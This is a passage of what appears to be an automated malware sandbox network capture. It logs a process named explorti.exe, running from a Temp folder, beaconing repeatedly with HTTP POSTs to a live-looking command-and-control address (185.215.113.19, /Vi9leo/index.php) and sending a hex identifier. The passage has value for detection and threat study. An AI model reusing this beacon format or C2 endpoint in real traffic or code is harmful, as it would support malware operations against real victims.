r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:45.106852055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49746	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:45.228585958 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:46.024502993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:46.027611971 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:46.318382025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49747	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:46.432498932 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:47.203946114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:47.204840899 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:47.459284067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49748	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:47.572741032 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:48.327229977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:48.328178883 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:48.572717905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49749	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:48.681963921 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:49.429882050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:49.433527946 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:49.698985100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49750	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:49.806972980 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:50.580631018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:50.581372023 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:50.833801985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49751	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:50.950716972 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:51.713211060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:51.714030027 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:51.967648029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49752	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:52.089699984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:52.865362883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:52.869106054 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:53.167388916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49753	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:53.275973082 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:54.057604074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:54.058449030 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:54.316154957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49754	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:54.431809902 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:55.221518993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:55.222232103 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:55.467113972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49755	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:55.587826014 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:56.373089075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:56.373842955 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:56.828052044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49756	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:56.949137926 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:57.747209072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:57.748028040 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:58.006788015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49757	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:58.119111061 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:58.906789064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:58.907546043 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:59.163927078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49758	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:59.275707960 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:00.031244993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
